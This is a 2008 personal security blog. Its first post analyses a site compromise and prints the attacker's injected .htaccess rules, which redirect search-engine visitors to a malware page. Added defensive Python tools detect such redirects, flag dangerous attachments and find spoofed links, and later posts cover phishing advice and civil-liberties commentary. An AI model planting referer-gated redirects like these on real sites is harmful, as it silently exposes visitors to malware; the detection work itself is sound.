Clock Cleaners

We'll clean your clock for a reasonable fee. (Also well versed in wagon repair)

Monday, December 1, 2008

So this website was compromised

So this website (mattmullen.net) was compromised recently, oddly enough. I guess those hackers were just too excited by the prospect of my traffic at upwards of 2 hits per day redirected to their malware site. It's quite a honeypot.

Anyway, here's all they did: they dropped a .htaccess file into the web root with the following contents (the attacker's host is redacted):

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://[IP Address of malware site]/in.html?s=xx [R,L]

The six RewriteCond lines are chained with [OR], and [NC] makes them case-insensitive, so any request whose Referer header contained one of those strings (i.e., a click-through from a major search engine) got a 302 to a fake spyware-removal page; [R] defaults to a 302 and [L] stops further rewriting. Anyone arriving by direct link or bookmark sends no Referer, matches nothing, and sees the normal site. That asymmetry is what makes this kind of compromise hard to notice: the owner rarely reaches his own site through a search engine. Note also that the patterns are unanchored substring matches, so `.*ask.*$` fires on any referring URL that happens to contain "ask", not just ask.com.
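The following is an added example, not code from the original post: a small Python script that parses an .htaccess file, flags any RewriteRule that sends visitors off-site while being gated on the Referer header (the signature of this injection), and simulates which referers trigger the redirect. The .htaccess text inside it is a constructed copy of the rules quoted above, with the documentation address 203.0.113.5 standing in for the redacted attacker IP; the site hostname and the sample referring URLs are assumptions for the demonstration.

```python
"""Find referer-gated off-site redirects in an .htaccess and simulate who gets sent where.

Added example, not code from the original post. INJECTED_HTACCESS is a constructed
copy of the rules quoted there, with the documentation address 203.0.113.5 standing
in for the redacted attacker IP. Only the slice of mod_rewrite syntax used by this
kind of injection is modelled.
"""
import re
from urllib.parse import urlparse

SITE_HOST = "mattmullen.net"   # the site whose .htaccess is being inspected

# Constructed sample modelled on the file the post quotes.
INJECTED_HTACCESS = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://203.0.113.5/in.html?s=xx [R,L]
"""


def parse_rules(text):
    """Group each RewriteRule with the RewriteCond lines that precede it."""
    rules, pending = [], []
    for raw in text.splitlines():
        parts = raw.split()
        if not parts or parts[0].startswith("#"):
            continue
        flags = set()
        if parts[-1].startswith("[") and parts[-1].endswith("]"):
            flags = {f.strip().upper() for f in parts.pop()[1:-1].split(",")}
        if parts[0] == "RewriteCond" and len(parts) == 3:
            pending.append((parts[1], parts[2], flags))
        elif parts[0] == "RewriteRule" and len(parts) == 3:
            rules.append({"pattern": parts[1], "target": parts[2],
                          "flags": flags, "conds": pending})
            pending = []
    return rules


def _cond_holds(cond, referer):
    var, pattern, flags = cond
    if var != "%{HTTP_REFERER}":
        return False            # other server variables are out of scope here
    return re.search(pattern, referer, re.IGNORECASE if "NC" in flags else 0) is not None


def conditions_hold(conds, referer):
    """Evaluate a RewriteCond chain the way mod_rewrite does: conditions are
    AND-ed unless a condition carries [OR], which joins it to the next one."""
    result, i = True, 0
    while i < len(conds):
        group_ok = False
        while True:                          # one run of [OR]-joined conditions
            cond = conds[i]
            group_ok = group_ok or _cond_holds(cond, referer)
            i += 1
            if "OR" not in cond[2] or i >= len(conds):
                break
        result = result and group_ok
    return result


def redirects_offsite(rule, site_host=SITE_HOST):
    """True if the target is an absolute URL on some other host."""
    target = urlparse(rule["target"])
    return bool(target.scheme) and target.hostname not in (None, site_host.lower())


def find_suspicious_rules(text, site_host=SITE_HOST):
    """Rules that send the visitor off-site AND only fire for certain referers.
    That combination, invisible to anyone arriving by bookmark, is the signature
    of the injection described in the post."""
    return [r for r in parse_rules(text)
            if redirects_offsite(r, site_host)
            and any(c[0] == "%{HTTP_REFERER}" for c in r["conds"])]


def where_does_visitor_go(text, referer, path="index.html"):
    """Simulate one request: the redirect target, or None if the page is served normally."""
    for rule in parse_rules(text):
        if re.search(rule["pattern"], path) and conditions_hold(rule["conds"], referer):
            return rule["target"]
    return None


if __name__ == "__main__":
    for r in find_suspicious_rules(INJECTED_HTACCESS):
        print(f"suspicious: -> {r['target']} gated on {len(r['conds'])} referer conditions")
    for ref in ("",                                                  # bookmark / typed URL
                "https://www.google.com/search?q=clock+cleaners",    # search click-through
                "http://www.taskmanager.example/",                   # 'task' contains 'ask'
                "http://friend.example/links.html"):
        print(f"{ref or '(no referer)':50} -> "
              f"{where_does_visitor_go(INJECTED_HTACCESS, ref) or 'served normally'}")
```

Run against a real web root with `find_suspicious_rules(open(path).read())` for every .htaccess you find; the simulator is also the quickest way to confirm the "bookmark works, search click-through doesn't" symptom without touching the live server. The taskmanager.example case shows how sloppy the attacker's regexes are: the redirect fires for any referring URL containing "ask".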

I've replaced the bad files, changed my passwords, and scanned all my machines for malware (0 hits), so my best guess is that they somehow got my FTP address, or compromised the host company and infected many of their users.


Wednesday, September 10, 2008

Cory references X references Cory

Cory Doctorow seems to be caught in an elaborate palindrome with the internet. Today I noticed it with Bruce Schneier.

Of course Cory already blogged about Bruce's blog (and he must have referenced Bruce in Little Brother, I'm sure ... almost sure... ok, not sure). Today Bruce blogged about gait recognition applied to shadows read by satellites, and he threw Cory a bone with a link back to Little Brother's discussion of low-tech gait recognition defeating techniques (i.e., rocks in shoes).

Cory already played this palindromatic game with Randall Munroe's webcomic. Cory blogs XKCD (actually a few times), XKCD comics Cory[1], then the comic is cosplayed by Cory and readers alike.

If the rate of references continues to accelerate, this could become an internet stability problem. Let's call it the Doctorow Vortex. Who will make a wikipedia page about it for me?

[1] Yes, 'comic' can be used as a verb, just like blog. Thanks for asking.


Tuesday, September 9, 2008

How to stay safe on the dangerous internet

I get asked a lot of questions about viruses (virii?), malware, and computer security by friends, family, & co-workers. I like to try to keep my advice as simple as possible for people who don't really want to learn all the complexities of computer hardware, software & networks - not that I could know every detail myself, anyhow.

I summarize it with 3 bullets. Here's how I stay safe on the dangerous internet:
  1. Don't open file attachments that you aren't expecting.
  2. Don't click links provided in emails that you aren't expecting.
  3. If a website or popup requests you to click somewhere, close it with ALT-F4.
I'll elaborate now on the details, but for those of you who need it simple, those bullets will go a long way.

Regarding item 1, virus protection: I keep hearing people say "only open attachments from your friends." Here's why that's foolish: when a worm infects a computer, it mails copies of itself to everyone in that machine's address book, and it forges the From: address while it's at it. That means an attachment that appears to come from a friend is, if anything, more likely to be a virus than one from a stranger, and the sender name proves nothing.

I say "only trust attachments that you are expecting." I mean that you are safest if you've already had a discussion with someone in person, on the phone, in IM, or in email that says "I've got that file you need. I'll email it to you." If that hasn't happened, be wary.

You have more leeway if you know how to spot dangerous attachments. As of September 2008, the really dangerous attachments are files Windows will run when double-clicked: .exe and .scr, but also .com, .bat, .cmd and .pif (all still executable on modern Windows), scripts such as .vbs, .js, .wsf and .hta (run by Windows Script Host or mshta), .msi installers and .lnk shortcuts. That list grows whenever an exploit is found in a viewer for a "harmless" format (the 2004 GDI+ JPEG bug, MS04-028, let a crafted image execute code), and it includes Microsoft Office documents if your macro security is set too low. Try not to fall for the double-extension trick, though. A file called britney.jpg.exe is an EXE, not a JPG. The final extension always wins, even when it is invisible: Windows Explorer hides known extensions by default (the "Hide extensions for known file types" option in Folder Options), so that file shows up as britney.jpg with an executable's icon. Turn that option off.
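As an added example (not from the original post), here is a Python helper that applies the "final extension wins" rule the way Windows does, including the double-extension trick and the less obvious fact that Windows ignores trailing spaces and dots in a filename. The extension sets are my 2008-era assumptions: the post's .exe/.scr/.com/.bat plus the other types Windows runs on double-click, and the Office formats that can carry macros.

```python
"""Classify an e-mail attachment by the extension Windows will actually honour.

Added example, not code from the original post. The extension sets are
assumptions (2008-era Windows defaults), not an authoritative list.
"""

# Types Windows runs directly on double-click (assumption: 2008-era Windows).
EXECUTABLE = {"exe", "scr", "com", "bat", "cmd", "pif", "msi", "lnk",
              "vbs", "vbe", "js", "jse", "wsf", "wsh", "hta"}
# Office formats that can carry macros; safe only if macro security blocks them.
MACRO_CAPABLE = {"doc", "dot", "xls", "xlt", "ppt", "pps",
                 "docm", "dotm", "xlsm", "xltm", "pptm"}


def effective_extension(filename):
    """Return the extension Windows uses to pick a handler, lowercased, or ''.

    Only the text after the LAST dot counts ('britney.jpg.exe' -> 'exe'). Windows
    strips trailing spaces and dots from names, so 'report.pdf .exe ' and
    'report.exe.' are both .exe files. Matching is case-insensitive.
    """
    name = filename.rstrip(" .")
    if "." not in name:
        return ""
    return name.rsplit(".", 1)[1].strip().lower()


def assess_attachment(filename, expected=False):
    """Return (verdict, reason). 'expected' means the sender told you in advance
    that this file was coming, which is the post's rule #1."""
    ext = effective_extension(filename)
    # every dotted segment after the base name, to spot the double-extension trick
    all_exts = [p.strip().lower() for p in filename.rstrip(" .").split(".")[1:]]
    if ext in EXECUTABLE:
        reason = f"'.{ext}' is executable"
        if len(all_exts) > 1:
            reason += f"; double extension disguises it as .{all_exts[-2]}"
        return "DANGEROUS", reason
    if ext in MACRO_CAPABLE:
        return "CAUTION", f"'.{ext}' can carry macros; open only with macros disabled"
    if not expected:
        return "CAUTION", "not executable by extension, but unexpected; confirm with the sender first"
    return "OK", f"'.{ext or '(none)'}' is not a known executable type"


if __name__ == "__main__":
    # constructed filenames for the demonstration
    for name, expected in (("britney.jpg.exe", False), ("Report.PDF   .ScR ", False),
                           ("budget.xls", True), ("photo.jpg", False), ("photo.jpg", True)):
        print(f"{name!r:24} expected={expected!s:5} -> {assess_attachment(name, expected)}")
```

The triage is deliberately conservative: an unexpected file with a harmless-looking extension still gets a CAUTION, because the post's real rule is about expectation, not file type.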

Regarding item #2, phishing protection: I just got another great phishing scam email today. It claimed to be from Equifax, a company I have done business with. It came from a plausible sender address (easy, because the From: header can be spoofed), it made a reasonable request (log in and update information), and it appeared to link to eport.equifax.com, a valid website. However, if I read the HTML email source, I find the link lies about what it links to. The href actually points to eport.equifax.file3.com. Read a hostname from the right: the registrable domain there is file3.com, and "eport.equifax" is just a subdomain the scammers created under a domain they own, so it is a completely different host collecting personal financial data. If you don't know how to examine URLs to recognize URL spoof attacks, it's safest to follow #2 and avoid clicking emailed URLs you're not expecting. If you want to visit the site anyway, open your browser and type in the address you already know - you're less likely to land on phishers that way.

Don't let emotions block reason. The ILOVEYOU worm of 2000 and the common "You've received an eCard from a friend!" emails play on people's desire for positive social interaction. A legitimate eCard site will at least tell you the name and email address of the sender before asking you to click anything, so you can validate the message. Also, be logical: if your birthday isn't for 8 months, who would send you an eCard today?
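As an added example, not code from the original post, here is the check described above done mechanically: parse the HTML of an email, and for every link whose visible text looks like a hostname, compare the registrable domain of what is shown with the registrable domain of where the href really goes. The sample message is constructed to reproduce the lure described in the post; the eport.equifax.file3.com host is the one the post names, and the paths and other links are made up. The registrable-domain helper uses a last-two-labels simplification rather than the Public Suffix List, which is enough for .com lures.

```python
"""Flag links in an HTML e-mail whose visible text names a different site
than the href actually points to.

Added example, not from the original post. SAMPLE_EMAIL is constructed; the
attacker host eport.equifax.file3.com is the one the post names.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse


def registrable_domain(host):
    """Last two labels of a hostname: 'eport.equifax.file3.com' -> 'file3.com'.

    Simplification: a real implementation consults the Public Suffix List so
    that names like example.co.uk are handled; fine for the .com lures here.
    """
    labels = host.lower().strip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


class _LinkCollector(HTMLParser):
    """Collect (href, visible text) for every <a> in the document."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def _host_in_text(text):
    """If the link's visible text looks like a URL or hostname, return that host."""
    t = text.strip()
    if "://" not in t:
        t = "http://" + t
    host = urlparse(t).hostname
    return host if host and "." in host and " " not in host else None


def find_deceptive_links(html):
    """Return (text, href, shown_domain, real_domain) for each link whose visible
    hostname and actual hostname belong to different registrable domains."""
    collector = _LinkCollector()
    collector.feed(html)
    hits = []
    for href, text in collector.links:
        shown = _host_in_text(text)
        real = urlparse(href).hostname if href else None
        if shown and real and registrable_domain(shown) != registrable_domain(real):
            hits.append((text, href, registrable_domain(shown), registrable_domain(real)))
    return hits


# Constructed phishing e-mail modelled on the one described in the post.
SAMPLE_EMAIL = """
<p>Dear customer, please log in and update your information:</p>
<a href="http://eport.equifax.file3.com/login.asp">eport.equifax.com</a>
<p>Questions? <a href="http://www.equifax.com/contact">www.equifax.com</a></p>
<a href="http://www.equifax.com/help">click here</a>
"""

if __name__ == "__main__":
    for text, href, shown, real in find_deceptive_links(SAMPLE_EMAIL):
        print(f"link text says {text} ({shown}) but goes to {href} ({real})")
```

Only the first link is flagged: the second genuinely points where it says, and the third has no hostname in its text to compare, which is exactly why "click here" links deserve the hover-and-read-the-status-bar treatment.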

Regarding item #3, malware protection: when a website pops up a window asking you to click anywhere, it may be trying to get your consent to install something, whether or not it says so. Clicking anywhere on these windows is dangerous, because sometimes the whole thing is an imagemap drawn to look like a dialog with a close box but acting as one big hidden "OK" button, so the "Cancel" and "X" you see are painted on and do the same thing as "Install". Using the keyboard to close them (ALT-F4 for a window in Windows, CTRL-F4 or CTRL-W if it's a tab in a tabbed browser) is much safer than clicking anywhere on them.

It's also good to note that malware often comes bundled with "free" software. You should question any free software product available on the web, especially if it's advertised. Where does a company get money to pay for advertising for a product that's given away for free? They get money from malware writers that pay them to infect your computer and collect your data, and/or send you popup advertising even when you're not browsing. Gator was a company that was expert at this; now they've changed their name to Claria to flee bad press.

If you're unsure, err on the side of caution. Do you really need that custom browser toolbar or the little weather application? Is it worth risking your security?

Wrap-up: I considered adding more bullets to the list. Item #4 might be "keep your software up-to-date". I'm trying to be concise, though. Most home users aren't running server operating systems with network services exposed, so they are less exposed to worms (though the browser and its plug-ins are what every web page gets to talk to, so if a fourth item is ever added, that is it). I could add items like "set your boot priority list to boot only from hard disk", but the goal is internet security, and not many people are still getting infected from removable storage media.

Good luck and happy safe browsing.

Comments? Suggestions? send them to matt@mattmullen.net.


Tuesday, June 17, 2008

FTC: Here to protect consumers, after it protects business

I'm a little annoyed with the Federal Trade Commission for pulling the plug on their credit card review service for consumers. Months ago, when visiting their website, I found a comprehensive spreadsheet of available banks offering credit cards. The spreadsheet compared all the important details - APR, hidden fees, credit report rating necessary to acquire the card, et cetera.

Apparently it's all been yanked - now they just have tips for choosing cards. Why take this information down? If it's out of date, it should be updated. If there's no funding to update it, it should be marked as historical, but not deleted. I hope the reason is not because the FTC is more interested in protecting predatory lenders than consumers.

The FTC talks about avoiding credit card fraud, too, but I had a laugh at this instruction:

Carry your cards separately from your wallet, in a zippered compartment, a business card holder, or another small pouch.

Wait - a wallet is a "small pouch" with "compartments" and "card holders". They just defined a wallet for you to put your cards in, while telling you not to put your cards in your wallet. ...so I should just carry two wallets? ...and I should put a sign on one pocket telling pickpockets that I prefer if they steal the neutral wallet? Good tip. Thanks, FTC.

I had my cards stolen by a thief once who made some charges to my account and used my identity to get credit on a number of purchases. You know what my biggest problem was? My bank decided I wasn't honest with them when I reported my card stolen, so they didn't follow the proper practices that would protect me. Instead they decided I had just lost my card, and issued a new one. Thanks, Wells Fargo. Customers love when you call them liars and don't take security seriously.


Monday, June 16, 2008

Ridiculous security: FakeTV

The FakeTV simulates a real TV's light output, so that burglars will think you're home watching TV when you're really away.

I think I already have one of these. It's called a real TV. Why would anyone buy this?

http://www.faketv.com/


Friday, June 13, 2008

Boumediene v. Bush: Justice Kennedy lays it down

I'm glad about the ruling in Boumediene v. Bush, and have been pleased with a few quotes I've seen from the opinion of the court written by Justice Kennedy.

I've heard a lot of the opposing viewpoint, and want to list my thoughts below.

Here are some important source documents:

You can read the syllabus and the decision on the web: syllabus of Boumediene v. Bush

You can also see how the framers of the US government thought a fair society should be built, based on the Declaration of Independence, the Bill of Rights, and the Constitution.

Boumediene v. Bush is about people captured in Afghanistan and abroad whom the government says are dangerous and can be held indefinitely, without trial, and without the right of habeas corpus (to seek relief from illegal detention). Bush says it's legal because Congress passed a bill in September 2001 (the Authorization for Use of Military Force) that read:

the President is authorized "to use all necessary and appropriate force against those nations, organizations, or persons he determines planned, authorized, committed, or aided the terrorist attacks that occurred on September 11, 2001, or harbored such organizations or persons, in order to prevent any future acts of international terrorism against the United States by such nations, organizations or persons."
But the Bill of Rights (the Fifth Amendment) says:
"No person shall be held to answer for a capital, or otherwise infamous crime, unless on a presentment or indictment of a Grand Jury, except in cases arising in the land or naval forces, or in the Militia, when in actual service in time of War or public danger; nor shall any person be subject for the same offense to be twice put in jeopardy of life or limb; nor shall be compelled in any criminal case to be a witness against himself, nor be deprived of life, liberty, or property, without due process of law; nor shall private property be taken for public use, without just compensation."
And the Declaration of Independence says:
"We hold these truths to be self-evident, that all men are created equal, that they are endowed by their Creator with certain unalienable Rights, that among these are Life, Liberty and the pursuit of Happiness. — That to secure these rights, Governments are instituted among Men, deriving their just powers from the consent of the governed, — That whenever any Form of Government becomes destructive of these ends, it is the Right of the People to alter or to abolish it, and to institute new Government, laying its foundation on such principles and organizing its powers in such form, as to them shall seem most likely to effect their Safety and Happiness."

I read that to mean that, until we tear up the Constitution, a person can't be imprisoned unless his crime is presented before a jury and he's given due process of law. The Sixth Amendment even guarantees that the trial will be speedy and public (not a secret tribunal).

Some would argue that these only apply to citizens, but I see no way of claiming a foreign person is less deserving of rights than a local - otherwise we don't hold those truths to be self-evident.

Others would argue that it makes allowances during times of war, but the USA is not at war with Afghanistan, and the petitioners are not citizens or soldiers of any nation with which the USA could be at war. If we were at war, then they are P.O.W.s. I cover that below.

If the government detains dangerous criminals, the government must have reason to believe they are criminals. They can show that reason (evidence) to a judge or jury and rule on their punishment if convicted. With no evidence, and no jury, there is nothing proving that the government is not detaining innocent people - this should be unacceptable to any reasonable person.

Some may argue that Guantanamo Bay detainees are P.O.W.s and may be treated differently than citizens. However, the USA must actually be at war to hold prisoners of war. We're not at war. Some argue we're at war on Terror. We're not. Hostage-takers are terrorists. The police have been handling them since Hammurabi etched some laws on tablets. That's not war.

If there was a war on terror, the war would never be over, as there are always potential terrorists at home and abroad. That would effectively nullify the Fifth Amendment. Article V of the Constitution says the document can only be changed by amendment, which takes two-thirds of both houses of Congress to propose and three-quarters of the states to ratify.

But we can play devil's advocate. Let's say Guantanamo Bay detainees are POWs even though they aren't. That would mean they are subject to protections agreed upon in the Third Geneva Convention:
They "shall in all circumstances be treated humanely," and "the following acts are and shall remain prohibited: violence to life and person; cruel treatment and torture; humiliating and degrading treatment; the passing of sentences and the carrying out of executions without previous judgment pronounced by a regularly constituted court affording all the judicial guarantees which are recognized as indispensable by civilized peoples."
It's clear that Guantanamo detainees are not having sentences pronounced by a regularly constituted court affording all the judicial guarantees recognized by civilized peoples - a direct violation of the Third Geneva Convention.
The last argument left for conservatives is that the detainees are neither POWs nor citizens - they are enemy combatants. The International Criminal Tribunal for the former Yugoslavia disagrees (and so do I), citing the ICRC's commentary on the Geneva Conventions:
"Every person in enemy hands must have some status under international law: he is either a prisoner of war and, as such, covered by the Third [Geneva] Convention, a civilian covered by the Fourth [Geneva] Convention, or again, a member of the medical personnel of the armed forces who is covered by the First Convention. There is no intermediate status; nobody in enemy hands can be outside the law."
George Bush can't just make up terms with which to classify people so that he can act outside of the law. It's a travesty that so many Americans think he can, and it's an assault on our Constitution that four of the nine justices on the Supreme Court think he can delete habeas corpus at will. Anyone who loves America should be outraged at our administration's attacks on America's core values.


Thursday, June 12, 2008

Tor semi-works

The EFF is great and so is Tor, but it's definitely not 100% useful. I've let Tor encrypt my traffic lately to test it out. It's highly functional, easy to install, and the graphic feedback is great.

However, it's clearly slower - I feel a little like I'm back on a modem in 1998's internet. On top of that, some websites look at the source IP address of the request (which over Tor is whichever exit relay you happen to be using, often in another country) and change their output accordingly. For instance, when I use Tor, Google keeps changing languages on me. Another US Government-funded site rejected me altogether, telling me it only took requests from USA IP addresses.

This is actually the fault of the Government site, of course - Americans should be allowed to conduct their business whether they are currently in the states or abroad (or anonymized) - but it makes Tor harder to use.


Thursday, June 5, 2008

Terrorists don't take pictures as much as photographers

You may have been following news stories that show security guards harassing citizens in malls, libraries, and train stations across the country. Here's a good one where, while the railway authority insists on-camera that they don't ban photography, they are interrupted by a security guard demanding that the camera be turned off.

Bruce Schneier is brilliant (as always) in his discussion of the ban on photography in the effort to stop terrorists:

Except that it's nonsense. The 9/11 terrorists didn't photograph anything. Nor did the London transport bombers, the Madrid subway bombers, or the liquid bombers arrested in 2006. Timothy McVeigh didn't photograph the Oklahoma City Federal Building. The Unabomber didn't photograph anything; neither did shoe-bomber Richard Reid. Photographs aren't being found amongst the papers of Palestinian suicide bombers. The IRA wasn't known for its photography. Even those manufactured terrorist plots that the US government likes to talk about -- the Ft. Dix terrorists, the JFK airport bombers, the Miami 7, the Lackawanna 6 -- no photography.

Given that real terrorists, and even wannabe terrorists, don't seem to photograph anything, why is it such pervasive conventional wisdom that terrorists photograph their targets? Why are our fears so great that we have no choice but to be suspicious of any photographer?


Friday, May 9, 2008

Credit card security

I had to pay a fine for a stop sign violation, and was first glad to see I could log onto the court website and pay without writing a check.

Then I considered every headline I've read of privacy bungling & data exposure committed by both corporate America and various global governments. I was sure that it would be mere months before my unencrypted credit card information was mailed somewhere random, left on an unattended laptop to be stolen, or just posted to the internet.

I think I better just write a check.
